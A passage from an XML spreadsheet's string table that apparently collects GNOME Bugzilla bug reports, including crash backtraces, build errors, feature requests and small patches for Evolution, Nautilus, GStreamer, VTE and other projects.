    <t>Add bug-buddy support to cheese.desktop</t>
  </si>
  <si>
    <t>Adding some X-GNOME-Bugzilla-* keys to cheese.desktop bug-buddy will be able to automatically send crash reports to bugzilla.gnome.org.
Here is the patch also fixing .desktop file syntax (thanks to `desktop-file-validate` utility). OK to commit?</t>
  </si>
  <si>
    <t>NAUTILUS-CD-BURNER-316410</t>
  </si>
  <si>
    <t>Add a hint for burn: location.</t>
  </si>
  <si>
    <t>When inserting a blank CD or DVD you can select burn a data CD when nautilus
pops up it should have text in the empty window that says Drag files here to
begin creating CD.</t>
  </si>
  <si>
    <t>EVOLUTION-257617</t>
  </si>
  <si>
    <t>remember window size</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Mandrakelinux release 10.1 (Cooker) for i586
Package: Evolution
Priority: Normal
Version: GNOME2.6.1 1.5.7
Gnome-Distributor: MandrakeSoft
Synopsis: remember window size
Bugzilla-Product: Evolution
Bugzilla-Component: UI
Bugzilla-Version: 1.5.7
Description:
Please describe your feature request:
Evolution does not seem to remember the window size. I resize it the way
I want but when it's closed and reopened it's back to the way it was
before.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>jmdrouhard</t>
  </si>
  <si>
    <t>PANGO-312057</t>
  </si>
  <si>
    <t>pangoft2.pc does not specify fontconfig as a requirement</t>
  </si>
  <si>
    <t>Version details: 1.9.1
Distribution/Version: Custom
pangotf2.pc does not specify fontconfig as a requirement while include/pango-1.
0/pango/pangoft2.h does contain a line #include .
The result is that when fontconfig is installed in a non-standard location 
fontconfig.h will not be found by the compiler when compiling a program that 
uses pangoft2. An error similar so this one will occur (example from dia):
    In file included from font.c:32:
    /opt/pango-1.9.1/include/pango-1.0/pango/pangoft2.h:26:35: fontconfig/
fontconfig.h: No such file or directory</t>
  </si>
  <si>
    <t>svdb+gnome-bugs</t>
  </si>
  <si>
    <t>GSTREAMER-324082</t>
  </si>
  <si>
    <t>[qtdemux] [faad] playback issues with quicktime videos</t>
  </si>
  <si>
    <t>Totem + gst 0.10 (including gst-ffmpeg HEAD) has problems playing back the
videos @ http://rubyonrails.org/screencasts.
Symptoms are:
1. qtdemux errors in terminal. Can't decode stream dialog appears.
2. grey rectangle with the changes in frames gradually appearing (start out with
a grey rectangle text appears as the user enters it in the video old changes
are not being cleared etc)
3. Problems reading local file:
(totem:21620): libgnomevfs-CRITICAL **: gnome_vfs_read_cancellable: assertion
`handle != NULL' failed
ERROR (0x8ff39c8 - 0:00:02.739307000)          gnomevfssrc(21620)
gstgnomevfssrc.c(1036):gst_gnomevfssrc_create: Failed to read data:
Invalid parameters
4. Internal dataflow error dialog appears for the flickr video on the above page.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-692442</t>
  </si>
  <si>
    <t>Online Accounts</t>
  </si>
  <si>
    <t>Replace the hacked up GtkTreeView with a EggListBox</t>
  </si>
  <si>
    <t>The Notifications Search and Privacy panel already use a EggListBox which is much easier to use and looks closer to what the designs specify.</t>
  </si>
  <si>
    <t>gnome-online-accounts-maint</t>
  </si>
  <si>
    <t>PAN-56015</t>
  </si>
  <si>
    <t>Crash while clicking 2 then Z</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Pan
Severity: normal
Version: 0.9.7pre5
Synopsis: Crash while clicking 2 then Z
Bugzilla-Product: Pan
Bugzilla-Component: general
Description:
I click '2' to increase the 'Thread' window size then after selecting a thread I click 'Z' to see all 3panes but the program crashes - everytime.
Debugging Information:
(no debugging symbols found)...[New Thread 1024 (LWP 1613)]
[New Thread 2049 (LWP 1614)]
[New Thread 1026 (LWP 1615)]
0x4051d519 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x4051d519 in __wait4 () from /lib/i686/libc.so.6
#1  0x4058d9e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x40459563 in waitpid (pid=1616 stat_loc=0xbfffe47c options=0)
    at wrapsyscall.c:172
#3  0x4009c262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x40457935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 136987304 esi = 1079557992 ebp = 3221219368 esp = 3221219360 ebx = 1078224524 edx = 73 ecx = 1079557992 eax = 136987304 trapno = 14 err = 4 eip = 1078149992 cs = 35 __csh = 0 eflags = 2163202 esp_at_signal = 3221219360 ss = 43 __ssh = 0 fpstate = 0xbfffe5a0 oldmask = 2147483648 cr2 = 73})
    at signals.c:97
#5  
#6  g_list_remove (list=0x4058bf68 data=0x82a42a8) at glist.c:276
#7  0x402aaee0 in gdk_window_internal_destroy (window=0x82a42a8 xdestroy=1 
    our_destroy=1) at gdkwindow.c:592
#8  0x402ab08b in gdk_window_destroy (window=0x82a42a8) at gdkwindow.c:685
#9  0x4024a1e2 in gtk_widget_real_unrealize (widget=0x82f7518)
    at gtkwidget.c:4556
#10 0x401fa134 in gtk_paned_unrealize (widget=0x82f7518) at gtkpaned.c:317
#11 0x401e1e4b in gtk_marshal_NONE__NONE (object=0x82f7518 
    func=0x401fa058  func_data=0x0 args=0xbfffe9b0)
    at gtkmarshal.c:312
#12 0x40210867 in gtk_signal_real_emit (object=0x82f7518 signal_id=13 
    params=0xbfffe9b0) at gtksignal.c:1440
#13 0x4020ea30 in gtk_signal_emit (object=0x82f7518 signal_id=13)
    at gtksignal.c:552
#14 0x40243550 in gtk_widget_unrealize (widget=0x82f7518) at gtkwidget.c:1703
#15 0x402425c3 in gtk_widget_unparent (widget=0x82f7518) at gtkwidget.c:1366
#16 0x4017ed05 in gtk_box_remove (container=0x82de340 widget=0x82f7518)
    at gtkbox.c:734
#17 0x401e1d6d in gtk_marshal_NONE__POINTER (object=0x82de340 
    func=0x4017ec00  func_data=0x0 args=0xbfffed80)
    at gtkmarshal.c:193
#18 0x40210867 in gtk_signal_real_emit (object=0x82de340 signal_id=62 
    params=0xbfffed80) at gtksignal.c:1440
#19 0x4020ea30 in gtk_signal_emit (object=0x82de340 signal_id=62)
    at gtksignal.c:552
#20 0x4019f378 in gtk_container_remove (container=0x82de340 widget=0x82f7518)
    at gtkcontainer.c:732
#21 0x40249b33 in gtk_widget_shutdown (object=0x82f7518) at gtkwidget.c:4386
#22 0x401f38ab in gtk_object_destroy (object=0x82f7518) at gtkobject.c:246
#23 0x402426f1 in gtk_widget_destroy (widget=0x82f7518) at gtkwidget.c:1391
#24 0x4017ee21 in gtk_box_forall (container=0x82de340 include_internals=0 
    callback=0x805ada4  callback_data=0x0) at gtkbox.c:776
#25 0x4019ffeb in gtk_container_foreach (container=0x82de340 
    callback=0x805ada4  callback_data=0x0)
    at gtkcontainer.c:1125
#26 0x08073e74 in gui_notebook_construct () at eval.c:41
#27 0x08071cdc in gui_set_layout () at eval.c:41
#28 0x0806ee22 in grouplist_activate_next_group () at eval.c:41
#29 0x401e1e4b in gtk_marshal_NONE__NONE (object=0x82b0700 
    func=0x806edc0  func_data=0x1 
    args=0xbffff260) at gtkmarshal.c:312
#30 0x4021156a in gtk_handlers_run (handlers=0x82a73c0 signal=0xbffff200 
    object=0x82b0700 params=0xbffff260 after=0) at gtksignal.c:1917
#31 0x402109bb in gtk_signal_real_emit (object=0x82b0700 signal_id=75 
    params=0xbffff260) at gtksignal.c:1477
#32 0x4020ea30 in gtk_signal_emit (object=0x82b0700 signal_id=75)
    at gtksignal.c:552
#33 0x40174a2e in gtk_accel_group_activate (accel_group=0x81eb838 
    accel_key=50 accel_mods=0) at gtkaccelgroup.c:268
#34 0x40174af4 in gtk_accel_groups_activate (object=0x81eb1d8 accel_key=50 
    accel_mods=0) at gtkaccelgroup.c:287
#35 0x4024dc1c in gtk_window_key_press_event (widget=0x81eb1d8 
    event=0x82ef790) at gtkwindow.c:1259
#36 0x401e1c21 in gtk_marshal_BOOL__POINTER (object=0x81eb1d8 
    func=0x4024dac8  func_data=0x0 
    args=0xbffff630) at gtkmarshal.c:28
#37 0x402109fb in gtk_signal_real_emit (object=0x81eb1d8 signal_id=32 
    params=0xbffff630) at gtksignal.c:1492
#38 0x4020ea30 in gtk_signal_emit (object=0x81eb1d8 signal_id=32)
    at gtksignal.c:552
#39 0x40245ee8 in gtk_widget_event (widget=0x81eb1d8 event=0x82ef790)
    at gtkwidget.c:2864
#40 0x401e1b1c in gtk_propagate_event (widget=0x828cf60 event=0x82ef790)
    at gtkmain.c:1360
#41 0x401e0d55 in gtk_main_do_event (event=0x82ef790) at gtkmain.c:818
#42 0x4029b16b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffffa00 user_data=0x0) at gdkevents.c:2139
#43 0x40435055 in g_main_dispatch (dispatch_time=0xbffffa00) at gmain.c:656
#44 0x40435659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#45 0x404357e8 in g_main_run (loop=0x82275c0) at gmain.c:935
#46 0x401e065b in gtk_main () at gtkmain.c:524
#47 0x0807e7ce in main () at eval.c:41
#48 0x4047f177 in __libc_start_main (main=0x807e420  argc=1 
    ubp_av=0xbffffb2c init=0x8058e0c  fini=0x80d613c  
    rtld_fini=0x4000e184  stack_end=0xbffffb1c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x4051d519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x4058d9e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x40459563 in waitpid (pid=1616 stat_loc=0xbfffe47c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffe47c
options = 0
result = 0
oldtype = 0
#3  0x4009c262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 1076539806
in_segv = 1
pid = 0
#4  0x40457935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 136987304 esi = 1079557992 ebp = 3221219368 esp = 3221219360 ebx = 1078224524 edx = 73 ecx = 1079557992 eax = 136987304 trapno = 14 err = 4 eip = 1078149992 cs = 35 __csh = 0 eflags = 2163202 esp_at_signal = 3221219360 ss = 43 __ssh = 0 fpstate = 0xbfffe5a0 oldmask = 2147483648 cr2 = 73})
    at signals.c:97
	in signals.c
signo = 0
__value = 0xfffffe00 
#5  
No locals.
#6  g_list_remove (list=0x4058bf68 data=0x82a42a8) at glist.c:276
	in glist.c
list = (GList *) 0x4058bf68
data = 0xfffffe00
tmp = (GList *) 0x0
#7  0x402aaee0 in gdk_window_internal_destroy (window=0x82a42a8 xdestroy=1 
    our_destroy=1) at gdkwindow.c:592
	in gdkwindow.c
window = (GdkWindow *) 0x82a42a8
private = (GdkWindowPrivate *) 0x0
temp_window = (GdkWindow *) 0xfffffe00
children = (GList *) 0x40243446
tmp = (GList *) 0x4058bf40
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-06-09 23:47 -------
The original reporter (brian@localhost.localdomain) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component charles@rebelbase.com.
</t>
  </si>
  <si>
    <t>VTE-561713</t>
  </si>
  <si>
    <t>crash on font cache cleanup</t>
  </si>
  <si>
    <t>Steps:
0) Start g-t
1) ls
2) zoom in a few times
3) ls
4) zoom out again to normal level
3) Wait 30 seconds
Results:
A nice crash :)
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 0xb716c700 (LWP 31368)]
0xb746c7e9 in g_object_get_qdata (object=0xaaaaaaaa quark=1287) at gobject.c:2446
2446	  g_return_val_if_fail (G_IS_OBJECT (object) NULL)
(gdb) where
#0  0xb746c7e9 in g_object_get_qdata (object=0xaaaaaaaa quark=1287) at gobject.c:2446
#1  0xb7924b5f in get_context_info (context=0xaaaaaaaa create=0) at pangocairo-context.c:71
#2  0xb7924e46 in pango_cairo_context_get_resolution (context=0xaaaaaaaa) at pangocairo-context.c:204
#3  0xb7fe095f in context_hash (context=0xaaaaaaaa) at vtepangocairo.c:424
#4  0xb739339c in g_hash_table_lookup_node (hash_table=0x9ae04f0 key=0xaaaaaaaa) at ghash.c:195
#5  0xb73938ab in g_hash_table_remove_internal (hash_table=0x9ae04f0 key=0xaaaaaaaa notify=1) at ghash.c:970
#6  0xb739393c in g_hash_table_remove (hash_table=0x9ae04f0 key=0xaaaaaaaa) at ghash.c:1005
#7  0xb7fe07e6 in font_info_unregister (info=0x9fc2cc8) at vtepangocairo.c:372
#8  0xb7fe0897 in font_info_destroy_delayed (info=0x9fc2cc8) at vtepangocairo.c:396
#9  0xb73a6d3e in g_timeout_dispatch (source=0x9eb3210 callback=0xb7fe085b  user_data=0x9fc2cc8) at gmain.c:3253
#10 0xb73a3846 in g_main_dispatch (context=0x9a8b798) at gmain.c:1814
#11 0xb73a4d1e in g_main_context_dispatch (context=0x9a8b798) at gmain.c:2367
#12 0xb73a5272 in g_main_context_iterate (context=0x9a8b798 block=1 dispatch=1 self=0x9a86040) at gmain.c:2448
#13 0xb73a5a59 in g_main_loop_run (loop=0x9a65750) at gmain.c:2656
#14 0xb7c237b3 in gtk_main () at gtkmain.c:1199
#15 0x0805afdf in main (argc=1 argv=0xbff7df84) at ../../src/terminal.c:398</t>
  </si>
  <si>
    <t>EVOLUTION-323125</t>
  </si>
  <si>
    <t>The default search bar shows a drop down to select the Category. After hitting
Clear this changes to Any Field Contains.
Steps to reproduce:
* start Evolution go to Calendar
* notice the Search Bar
* hit the Clear button
Reproducible: always
IMHO the Search Bar should default to Any Field Contains always. At least this
should be the same.</t>
  </si>
  <si>
    <t>NAUTILUS-45440</t>
  </si>
  <si>
    <t>Horizontal scrollbars seen when reducing Nautilus window width</t>
  </si>
  <si>
    <t xml:space="preserve">As I reduce the width of my Nautilus window while viewing my home directory I
am seeing a horizontal scrollbar right before the width is small enough to
reduce the column count.  I'm unable to generalize it enough to the point of
long filenames being the cause but I suspect that may be involved.
My home directory on Eazel's internal network /h/brett is readable and
displays this problem every time.
Starting with Nautilus in Icon View at /h/brett and showing 4 columns layout by
name slowly reduce the width of the Nautilus window so columns get removed and
the view is redrawn.  Watch for the horizontal scrollbars that appear right
before each column is removed.
My expectation is that if a horizontal scrollbar is needed it should actually
result in column removal.
For reference see also bug #43485 regarding icon view wrapping too soon and bug
#45232 regarding 'tighter layout' using horizontal scrollbars also.
------- Additional Comments From darin@bentspoon.com 2001-01-04 17:51:47 ----
I believe the scrollbars appear for a moment before the view is layed out to fit
the new size. It would be even better if they didn't appear at all.
------- Additional Comments From sullivan@eazel.com 2001-03-13 09:50:12 ----
I think this was fixed when bug 47164 was fixed.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:53 -------
</t>
  </si>
  <si>
    <t>GOSSIP-121000</t>
  </si>
  <si>
    <t>Send Chat Message confusing</t>
  </si>
  <si>
    <t>This menu item confuses me. Richard says it's just a place holder. I'm
assuming that it's ment to be for sending a single message to someone.
If that's the case then it should be just Send Message to avoid
confusion with the Join group chat menu item.
http://lists.imendio.com/pipermail/gossip-dev/2003-August/000032.html</t>
  </si>
  <si>
    <t>sisob</t>
  </si>
  <si>
    <t>GSTREAMER-129961</t>
  </si>
  <si>
    <t>gst-plugins-0.73 does not build well against mjpegtools-1.6.1.92</t>
  </si>
  <si>
    <t>This is just a heads up patch to demonstrate changes that might be
necessary.  It also includes diffs that I posted on bug 127951.
diff -ru gst-plugins-0.7.3.orig/ext/mad/gstid3tag.c
gst-plugins-0.7.3/ext/mad/gstid3tag.c
--- gst-plugins-0.7.3.orig/ext/mad/gstid3tag.c  2003-12-15
00:45:09.000000000 -0800
+++ gst-plugins-0.7.3/ext/mad/gstid3tag.c       2003-12-23
16:43:35.000000000 -0800
@@ -4748 +4749 @@
          tmp = strtoul (utf8 
          if (*check != '\0') break
          if (strcmp (tag_name GST_TAG_DATE) == 0) {
+           GDate *d
            if (tmp == 0) break
-           GDate *d = g_date_new_dmy (1 1 tmp)
+           d = g_date_new_dmy (1 1 tmp)
            tmp = g_date_get_julian (d)
            g_date_free (d)
          }
diff -ru gst-plugins-0.7.3.orig/ext/mpeg2enc/gstmpeg2encoder.cc
gst-plugins-0.7.3/ext/mpeg2enc/gstmpeg2encoder.cc
--- gst-plugins-0.7.3.orig/ext/mpeg2enc/gstmpeg2encoder.cc      2003-12-11
13:07:25.000000000 -0800
+++ gst-plugins-0.7.3/ext/mpeg2enc/gstmpeg2encoder.cc   2003-12-23
22:19:31.000000000 -0800
@@ -2410 +2411 @@
 #endif
 #include 
-#include 
-#include 
-#include 
-#include 
+#include 
+#include 
+#include 
+#include 
+#include 
 #include gstmpeg2encoder.hh
diff -ru gst-plugins-0.7.3.orig/ext/mpeg2enc/gstmpeg2encoder.hh
gst-plugins-0.7.3/ext/mpeg2enc/gstmpeg2encoder.hh
--- gst-plugins-0.7.3.orig/ext/mpeg2enc/gstmpeg2encoder.hh      2003-12-11
13:07:25.000000000 -0800
+++ gst-plugins-0.7.3/ext/mpeg2enc/gstmpeg2encoder.hh   2003-12-23
17:57:25.000000000 -0800
@@ -227 +227 @@
 #ifndef __GST_MPEG2ENCODER_H__
 #define __GST_MPEG2ENCODER_H__
-#include 
+#include 
 #include gstmpeg2encoptions.hh
 #include gstmpeg2encpicturereader.hh
 #include gstmpeg2encstreamwriter.hh
diff -ru gst-plugins-0.7.3.orig/ext/mpeg2enc/gstmpeg2encoptions.hh
gst-plugins-0.7.3/ext/mpeg2enc/gstmpeg2encoptions.hh
--- gst-plugins-0.7.3.orig/ext/mpeg2enc/gstmpeg2encoptions.hh   2003-12-11
13:07:25.000000000 -0800
+++ gst-plugins-0.7.3/ext/mpeg2enc/gstmpeg2encoptions.hh        2003-12-23
17:40:46.000000000 -0800
@@ -237 +237 @@
 #define __GST_MPEG2ENCOPTIONS_H__
 #include 
-#include 
+#include 
 class GstMpeg2EncOptions : public MPEG2EncOptions {
 public:
diff -ru gst-plugins-0.7.3.orig/ext/mpeg2enc/gstmpeg2encpicturereader.cc
gst-plugins-0.7.3/ext/mpeg2enc/gstmpeg2encpicturereader.cc
--- gst-plugins-0.7.3.orig/ext/mpeg2enc/gstmpeg2encpicturereader.cc    
2003-12-11 13:07:25.000000000 -0800
+++ gst-plugins-0.7.3/ext/mpeg2enc/gstmpeg2encpicturereader.cc  2003-12-23
22:20:34.000000000 -0800
@@ -237 +237 @@
 #include config.h
 #endif
-#include 
+#include 
 #include gstmpeg2encpicturereader.hh
diff -ru gst-plugins-0.7.3.orig/ext/mpeg2enc/gstmpeg2encpicturereader.hh
gst-plugins-0.7.3/ext/mpeg2enc/gstmpeg2encpicturereader.hh
--- gst-plugins-0.7.3.orig/ext/mpeg2enc/gstmpeg2encpicturereader.hh    
2003-12-11 13:07:25.000000000 -0800
+++ gst-plugins-0.7.3/ext/mpeg2enc/gstmpeg2encpicturereader.hh  2003-12-23
20:44:53.000000000 -0800
@@ -247 +247 @@
 #include 
-#include 
+#include 
 #include gstmpeg2encoptions.hh
 class GstMpeg2EncPictureReader : public PictureReader {
diff -ru gst-plugins-0.7.3.orig/ext/mpeg2enc/gstmpeg2encstreamwriter.hh
gst-plugins-0.7.3/ext/mpeg2enc/gstmpeg2encstreamwriter.hh
--- gst-plugins-0.7.3.orig/ext/mpeg2enc/gstmpeg2encstreamwriter.hh     
2003-12-11 13:07:25.000000000 -0800
+++ gst-plugins-0.7.3/ext/mpeg2enc/gstmpeg2encstreamwriter.hh   2003-12-23
17:54:06.000000000 -0800
@@ -247 +247 @@
 #include 
-#include 
+#include 
 class GstMpeg2EncStreamWriter : public ElemStrmWriter {
 public:
diff -ru gst-plugins-0.7.3.orig/ext/sdl/Makefile.in
gst-plugins-0.7.3/ext/sdl/Makefile.in
--- gst-plugins-0.7.3.orig/ext/sdl/Makefile.in  2003-12-19
08:07:46.000000000 -0800
+++ gst-plugins-0.7.3/ext/sdl/Makefile.in       2003-12-23
13:18:47.000000000 -0800
@@ -4897 +4897 @@
 am_libgstsdlvideosink_la_OBJECTS = libgstsdlvideosink_la-sdlvideosink.lo
 libgstsdlvideosink_la_OBJECTS = $(am_libgstsdlvideosink_la_OBJECTS)
-DEFAULT_INCLUDES =  -I. -I$(srcdir) -I$(top_builddir)
+DEFAULT_INCLUDES =  -I. -I$(srcdir) -I$(top_builddir) $(X_CFLAGS)
 depcomp = $(SHELL) $(top_srcdir)/depcomp
 am__depfiles_maybe = depfiles
 @AMDEP_TRUE@DEP_FILES = \
diff -ru gst-plugins-0.7.3.orig/gst-libs/gst/xoverlay/Makefile.in
gst-plugins-0.7.3/gst-libs/gst/xoverlay/Makefile.in
--- gst-plugins-0.7.3.orig/gst-libs/gst/xoverlay/Makefile.in    2003-12-19
08:07:55.000000000 -0800
+++ gst-plugins-0.7.3/gst-libs/gst/xoverlay/Makefile.in 2003-12-23
13:18:47.000000000 -0800
@@ -4887 +4887 @@
 am_libgstxoverlay_la_OBJECTS = libgstxoverlay_la-xoverlay.lo
 libgstxoverlay_la_OBJECTS = $(am_libgstxoverlay_la_OBJECTS)
-DEFAULT_INCLUDES =  -I. -I$(srcdir) -I$(top_builddir)
+DEFAULT_INCLUDES =  -I. -I$(srcdir) -I$(top_builddir) $(X_CFLAGS)
 depcomp = $(SHELL) $(top_srcdir)/depcomp
 am__depfiles_maybe = depfiles
 @AMDEP_TRUE@DEP_FILES = ./$(DEPDIR)/libgstxoverlay_la-xoverlay.Plo
diff -ru gst-plugins-0.7.3.orig/sys/v4l/Makefile.in
gst-plugins-0.7.3/sys/v4l/Makefile.in
--- gst-plugins-0.7.3.orig/sys/v4l/Makefile.in  2003-12-19
08:08:18.000000000 -0800
+++ gst-plugins-0.7.3/sys/v4l/Makefile.in       2003-12-23
13:18:47.000000000 -0800
@@ -5177 +5177 @@
        libgstvideo4linux_la-gstv4lcolorbalance.lo
 libgstvideo4linux_la_OBJECTS = $(am_libgstvideo4linux_la_OBJECTS)
-DEFAULT_INCLUDES =  -I. -I$(srcdir) -I$(top_builddir)
+DEFAULT_INCLUDES =  -I. -I$(srcdir) -I$(top_builddir) $(X_CFLAGS)
 depcomp = $(SHELL) $(top_srcdir)/depcomp
 am__depfiles_maybe = depfiles
 @AMDEP_TRUE@DEP_FILES = ./$(DEPDIR)/libgstvideo4linux_la-gstv4l.Plo \</t>
  </si>
  <si>
    <t>dalgoda</t>
  </si>
  <si>
    <t>JHBUILD-504648</t>
  </si>
  <si>
    <t>Mystery message finishing compilign telepathy-gabble</t>
  </si>
  <si>
    <t>make[2]: Nothing to be done for `install-exec-am'.
make[2]: Nothing to be done for `install-data-am'.
make[2]: Leaving directory `/home/luca/svn/gnome2/telepathy-gabble'
make[1]: Leaving directory `/home/luca/svn/gnome2/telepathy-gabble'
Traceback (most recent call last):
  File /home/luca/bin/jhbuild line 6 in ?
    jhbuild.main.main(sys.argv[1:])
  File /home/luca/svn/gnome2/jhbuild/jhbuild/main.py line 89 in main
    rc = jhbuild.commands.run(command config args)
  File /home/luca/svn/gnome2/jhbuild/jhbuild/commands/__init__.py line 77 in run
    return cmd.execute(config args)
  File /home/luca/svn/gnome2/jhbuild/jhbuild/commands/__init__.py line 43 in execute
    return self.run(config options args)
  File /home/luca/svn/gnome2/jhbuild/jhbuild/commands/base.py line 245 in run
    return build.build()
  File /home/luca/svn/gnome2/jhbuild/jhbuild/frontends/buildscript.py line 95 in build
    nextstate error altstates = module.run_state(self state)
  File /home/luca/svn/gnome2/jhbuild/jhbuild/modtypes/__init__.py line 191 in run_state
    method(buildscript)
  File /home/luca/svn/gnome2/jhbuild/jhbuild/modtypes/autotools.py line 223 in do_install
    buildscript.packagedb.add(self.name self.get_revision() or '')
  File /home/luca/svn/gnome2/jhbuild/jhbuild/modtypes/autotools.py line 76 in get_revision
    return self.branch.tree_id()
  File /home/luca/svn/gnome2/jhbuild/jhbuild/versioncontrol/darcs.py line 111 in tree_id
    return md5.md5(file(os.path.join(self.srcdir '_darcs' 'inventory').read())).hexdigest()
AttributeError: 'unicode' object has no attribute 'read'
PS sorry for the summary but....</t>
  </si>
  <si>
    <t>GPDF-165710</t>
  </si>
  <si>
    <t>PDF Viewer crashes on ConTeXt-generated documents</t>
  </si>
  <si>
    <t xml:space="preserve">
Distribution: Debian 3.1
Package: gpdf
Severity: normal
Version: GNOME2.6.1 (null)
Gnome-Distributor: Debian
Synopsis: PDF Viewer crashes on ConTeXt-generated documents
Bugzilla-Product: gpdf
Bugzilla-Component: general
Bugzilla-Version: (null)
BugBuddy-GnomeVersion: 2.0 (2.6.1.1)
Description:
Description of the crash:
PDF Viewer crashes with some of the pdf files produced
by ConTeXt that can be found at
	http://www.pragma-ade.nl/overview.htm
e.g.
	http://www.pragma-ade.nl/showcase.pdf
Steps to reproduce the crash:
1. Open showcase.pdf in PDF Viewer
2. Click on any of document-internal links
or
3. page-up or page-down the document
Expected Results:
No crash
How often does this happen?
reproducably
Additional Information:
on Debian sarge with package:
ii  gpdf           2.8.0-0.1      Portable Document Format (PDF) viewer
------- Bug moved to this database by unknown@bugzilla.gnome.org 2005-01-30 09:51 -------
Unknown version (null) in product gpdf.  Setting version to unspecified.
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product gpdf.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was mike@rainbow.studorg.tuwien.ac.at.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>GNOME-UTILS-50471</t>
  </si>
  <si>
    <t>Fatal crash of gnome after exiting system info</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnome-utils
Severity: normal
Version:  1.2.0
Synopsis: Fatal crash of gnome after exiting system info
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.16-22 i686 unknown
C library: glibc-2.1.92-14
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20-8
gnome-core: gnome-core 1.2.1
Description:
I was in Gnome looking at the programs -&gt; system -&gt; system info after
exiting system info Gnome crashed with a fatal error.
Debugging information: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0x4052a5a9 in __wait4 () from /lib/libc.so.6
#0  0x4052a5a9 in __wait4 () from /lib/libc.so.6
#1  0x40594824 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40091b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x804d24e in main ()
#5  0x4040e983 in g_timeout_dispatch () from /usr/lib/libglib-1.2.so.0
#6  0x4040d987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#7  0x4040e001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#8  0x4040e1cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#9  0x401dbe57 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#10 0x804afef in main ()
#11 0x40490b65 in __libc_start_main (main=0x804af6c  argc=1 
    ubp_av=0xbffff9a4 init=0x804a560  fini=0x804f72c  
    rtld_fini=0x4000df24  stack_end=0xbffff99c)
    at ../sysdeps/generic/libc-start.c:111
#0  0x4052a5a9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40594824 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40091b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x804d24e in main ()
No symbol table info available.
#5  0x4040e983 in g_timeout_dispatch () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#6  0x4040d987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#7  0x4040e001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-01-31 08:16 -------
Unknown version 1.2.x in product gnome-utils. Setting version to the default unspecified.
The original reporter (rick@chezwatts.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-utils-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>RHYTHMBOX-338561</t>
  </si>
  <si>
    <t>Add context menu to the iPod source</t>
  </si>
  <si>
    <t>The attached patch adds a context menu to the iPod source with eject and rename menu items. It also marks the source as renamable and adds an eject toolbar item.</t>
  </si>
  <si>
    <t>NAUTILUS-357573</t>
  </si>
  <si>
    <t>share list-view target list to save a bit of memory.</t>
  </si>
  <si>
    <t>The list view dnd target list should be shared across all the list views instaed of created for each one of them. Beside it can be created lazily.
The following patch does that: I simply put the list in a static var since it's what fm-list-model does too the alternative is to simply create it on the fly each time.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-130625</t>
  </si>
  <si>
    <t>s/File types and programs/File Associations</t>
  </si>
  <si>
    <t>Bit of a lame JDS patch here so very doubtful this should be changed given
that the capplet goes away in the 2.8 timeframe. Patch attached anyway for
completeness.</t>
  </si>
  <si>
    <t>EVOLUTION-253870</t>
  </si>
  <si>
    <t>deadlock when e-d-s crashes ...</t>
  </si>
  <si>
    <t>This is an ORB bug here for Gerado's benefit in finding dups :-)
Thread 13 (Thread 2080780 (LWP 7991)):
#0  0x413e6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413e69d8 in __pthread_wait_for_restart_signal () from
/lib/i686/libpthread.so.0
#2  0x413e2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x415bd3a8 in g_async_queue_push_unlocked () from /usr/lib/libglib-2.0.so.0
